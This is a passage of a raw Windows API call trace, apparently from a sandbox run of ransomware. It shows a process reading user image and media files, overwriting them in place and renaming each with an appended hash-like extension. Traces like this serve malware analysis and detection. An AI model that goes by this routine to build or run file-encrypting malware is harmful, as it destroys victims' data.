lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a.C4E75180B7201C50EFA4E48DD8EBD22A8DAA5E66265EA821106D149F02EC196D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a.C4E75180B7201C50EFA4E48DD8EBD22A8DAA5E66265EA821106D149F02EC196D" [0165.943] GetProcessHeap () returned 0x270000 [0165.943] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4276e68 [0165.943] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x708f9d4, FileInformation=0x4276e68, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0165.945] CloseHandle (hObject=0x304) returned 1 [0165.950] GetProcessHeap () returned 0x270000 [0165.951] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0165.951] RtlInterlockedCompareExchange64 () returned 0x2 [0165.951] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.211] ReadFile (in: hFile=0x304, lpBuffer=0x7492450, nNumberOfBytesToRead=0x4c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0168.212] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.212] ReadFile (in: hFile=0x5e0, lpBuffer=0x7660438, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7640300 | out: lpBuffer=0x7660438*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7640300) returned 1 [0168.212] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.212] ReadFile (in: hFile=0x5dc, lpBuffer=0x752a2a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a170) returned 1 [0168.213] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.213] ReadFile (in: hFile=0x5d8, lpBuffer=0x7552400, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8) returned 1 [0168.213] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.214] ReadFile (in: hFile=0x5d4, lpBuffer=0x757a558, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a420) returned 1 [0168.214] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.214] ReadFile (in: hFile=0x5d0, lpBuffer=0x75a26b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7582578) returned 1 [0168.216] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.216] ReadFile (in: hFile=0x5cc, lpBuffer=0x75ca808, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa6d0) returned 1 [0168.216] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.216] ReadFile (in: hFile=0x5c8, lpBuffer=0x76d9030, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8) returned 1 [0168.217] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.217] ReadFile (in: hFile=0x5c4, lpBuffer=0x7701188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050) returned 1 [0168.217] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.218] ReadFile (in: hFile=0x5a8, lpBuffer=0x77292e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8) returned 1 [0168.218] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.218] ReadFile (in: hFile=0x594, lpBuffer=0x7751438, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7731300 | out: lpBuffer=0x7751438*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7731300) returned 1 [0168.219] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.219] ReadFile (in: hFile=0x4a8, lpBuffer=0x7779590, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759458 | out: lpBuffer=0x7779590*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759458) returned 1 [0168.219] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.220] WriteFile (in: hFile=0x304, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0168.222] RtlInterlockedCompareExchange64 () returned 0x0 [0168.222] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.222] WriteFile (in: hFile=0x5e0, lpBuffer=0x7660438*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7640300 | out: lpBuffer=0x7660438*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7640300) returned 1 [0168.223] RtlInterlockedCompareExchange64 () returned 0x1 [0168.223] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.223] WriteFile (in: hFile=0x5dc, lpBuffer=0x752a2a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170) returned 1 [0168.225] RtlInterlockedCompareExchange64 () returned 0x2 [0168.225] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.225] WriteFile (in: hFile=0x5d8, lpBuffer=0x7552400*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75322c8) returned 1 [0168.226] RtlInterlockedCompareExchange64 () returned 0x3 [0168.226] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.227] WriteFile (in: hFile=0x5d4, lpBuffer=0x757a558*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420) returned 1 [0168.228] RtlInterlockedCompareExchange64 () returned 0x4 [0168.228] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.228] WriteFile (in: hFile=0x5d0, lpBuffer=0x75a26b0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578 | out: lpBuffer=0x75a26b0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7582578) returned 1 [0168.229] RtlInterlockedCompareExchange64 () returned 0x5 [0168.229] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.229] WriteFile (in: hFile=0x5cc, lpBuffer=0x75ca808*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0) returned 1 [0168.232] RtlInterlockedCompareExchange64 () returned 0x6 [0168.232] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.232] WriteFile (in: hFile=0x5c8, lpBuffer=0x76d9030*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8) returned 1 [0168.233] RtlInterlockedCompareExchange64 () returned 0x7 [0168.233] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.233] WriteFile (in: hFile=0x5c4, lpBuffer=0x7701188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050) returned 1 [0168.235] RtlInterlockedCompareExchange64 () returned 0x8 [0168.235] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.235] WriteFile (in: hFile=0x5a8, lpBuffer=0x77292e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8) returned 1 [0168.237] RtlInterlockedCompareExchange64 () returned 0x9 [0168.237] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.237] WriteFile (in: hFile=0x594, lpBuffer=0x7751438*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7731300 | out: lpBuffer=0x7751438*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7731300) returned 1 [0168.238] RtlInterlockedCompareExchange64 () returned 0xa [0168.239] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.239] WriteFile (in: hFile=0x4a8, lpBuffer=0x7779590*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759458 | out: lpBuffer=0x7779590*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759458) returned 1 [0168.240] RtlInterlockedCompareExchange64 () returned 0xb [0168.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.240] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x74723c8, ReturnLength=0x708f9e4) returned 0x0 [0168.241] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif", lpString2=".5FC2E595C273A69C2BC3DE010CCA665EC17C10C22C5E70A7F5B924F40359FE25" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif.5FC2E595C273A69C2BC3DE010CCA665EC17C10C22C5E70A7F5B924F40359FE25") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif.5FC2E595C273A69C2BC3DE010CCA665EC17C10C22C5E70A7F5B924F40359FE25" [0168.241] GetProcessHeap () returned 0x270000 [0168.241] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x4267b70 [0168.241] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x708f9d4, FileInformation=0x4267b70, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0168.243] CloseHandle (hObject=0x304) returned 1 [0168.244] GetProcessHeap () returned 0x270000 [0168.245] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0168.245] RtlInterlockedCompareExchange64 () returned 0xc [0168.245] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.246] NtQueryObject (in: Handle=0x5e0, ObjectInformationClass=0x1, ObjectInformation=0x76403b0, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76403b0, ReturnLength=0x708f9e4) returned 0x0 [0168.247] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif", lpString2=".435838306025C649E16EE1F388F3365E670F438EBFAAC28BBC4EA4A2F0499060" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif.435838306025C649E16EE1F388F3365E670F438EBFAAC28BBC4EA4A2F0499060") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\1ZWvVhvziyMt_nXcJ.gif.435838306025C649E16EE1F388F3365E670F438EBFAAC28BBC4EA4A2F0499060" [0168.247] GetProcessHeap () returned 0x270000 [0168.247] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb9e0 [0168.247] NtSetInformationFile (FileHandle=0x5e0, IoStatusBlock=0x708f9d4, FileInformation=0x42fb9e0, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0168.250] CloseHandle (hObject=0x5e0) returned 1 [0168.251] GetProcessHeap () returned 0x270000 [0168.253] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7640300 | out: hHeap=0x270000) returned 1 [0168.253] RtlInterlockedCompareExchange64 () returned 0xb [0168.253] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.253] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, ObjectInformation=0x750a220, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x750a220, ReturnLength=0x708f9e4) returned 0x0 [0168.254] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png", lpString2=".628BDAD85607FAD73A0979FCF1F5B2CDD56F09A3CB10FD19F6C26200898DC93E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png.628BDAD85607FAD73A0979FCF1F5B2CDD56F09A3CB10FD19F6C26200898DC93E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\aITse3WKP.png.628BDAD85607FAD73A0979FCF1F5B2CDD56F09A3CB10FD19F6C26200898DC93E" [0168.254] GetProcessHeap () returned 0x270000 [0168.254] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x43326b0 [0168.255] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x708f9d4, FileInformation=0x43326b0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0168.257] CloseHandle (hObject=0x5dc) returned 1 [0168.258] GetProcessHeap () returned 0x270000 [0168.259] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a170 | out: hHeap=0x270000) returned 1 [0168.260] RtlInterlockedCompareExchange64 () returned 0xa [0168.260] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.260] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x7532378, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7532378, ReturnLength=0x708f9e4) returned 0x0 [0168.261] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png", lpString2=".FCF507D19E9A0269DDCA0E8908440DF6AECE3BAF5296B33477A67894434C1854" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png.FCF507D19E9A0269DDCA0E8908440DF6AECE3BAF5296B33477A67894434C1854") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\axKsNotAR2.png.FCF507D19E9A0269DDCA0E8908440DF6AECE3BAF5296B33477A67894434C1854" [0168.261] GetProcessHeap () returned 0x270000 [0168.261] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12e) returned 0x43327e8 [0168.261] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x708f9d4, FileInformation=0x43327e8, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0168.263] CloseHandle (hObject=0x5d8) returned 1 [0168.264] GetProcessHeap () returned 0x270000 [0168.266] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75322c8 | out: hHeap=0x270000) returned 1 [0168.266] RtlInterlockedCompareExchange64 () returned 0x9 [0168.266] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.266] NtQueryObject (in: Handle=0x5d4, ObjectInformationClass=0x1, ObjectInformation=0x755a4d0, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x755a4d0, ReturnLength=0x708f9e4) returned 0x0 [0168.267] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png", lpString2=".535EA682CCC0BA571277E03131FC8301F496FDC9870759064262E1AE86B74512" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png.535EA682CCC0BA571277E03131FC8301F496FDC9870759064262E1AE86B74512") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\BiDOMKYS_7eYkJlO7mV.png.535EA682CCC0BA571277E03131FC8301F496FDC9870759064262E1AE86B74512" [0168.267] GetProcessHeap () returned 0x270000 [0168.267] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x4263d40 [0168.267] NtSetInformationFile (FileHandle=0x5d4, IoStatusBlock=0x708f9d4, FileInformation=0x4263d40, Length=0x140, FileInformationClass=0xa) returned 0x0 [0168.268] CloseHandle (hObject=0x5d4) returned 1 [0168.269] GetProcessHeap () returned 0x270000 [0168.271] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a420 | out: hHeap=0x270000) returned 1 [0168.281] RtlInterlockedCompareExchange64 () returned 0x8 [0168.281] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.281] NtQueryObject (in: Handle=0x5d0, ObjectInformationClass=0x1, ObjectInformation=0x7582628, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7582628, ReturnLength=0x708f9e4) returned 0x0 [0168.282] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif", lpString2=".AF0C1CC268F9B1F306EB44081462069CFFB3D392FB24EFF0683FF1D9E537A600" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif.AF0C1CC268F9B1F306EB44081462069CFFB3D392FB24EFF0683FF1D9E537A600") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\DZm0D9mWkUWh0_9o4.gif.AF0C1CC268F9B1F306EB44081462069CFFB3D392FB24EFF0683FF1D9E537A600" [0168.282] GetProcessHeap () returned 0x270000 [0168.282] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x4263e88 [0168.282] NtSetInformationFile (FileHandle=0x5d0, IoStatusBlock=0x708f9d4, FileInformation=0x4263e88, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0168.285] CloseHandle (hObject=0x5d0) returned 1 [0168.286] GetProcessHeap () returned 0x270000 [0168.287] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7582578 | out: hHeap=0x270000) returned 1 [0168.294] RtlInterlockedCompareExchange64 () returned 0x7 [0168.294] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0168.294] NtQueryObject (in: Handle=0x5c8, ObjectInformationClass=0x1, ObjectInformation=0x76b8fa8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76b8fa8, ReturnLength=0x708f9e4) returned 0x0 [0168.295] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif", lpString2=".C6B905FC9050EC9D6D88AB05084137DA15B3D550AB6FE80C88E910A08B8E0C44" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif.C6B905FC9050EC9D6D88AB05084137DA15B3D550AB6FE80C88E910A08B8E0C44") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\OEA6GlM0U9_7N3aR.gif.C6B905FC9050EC9D6D88AB05084137DA15B3D550AB6FE80C88E910A08B8E0C44" [0168.295] GetProcessHeap () returned 0x270000 [0168.295] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13a) returned 0x74181c0 [0168.296] 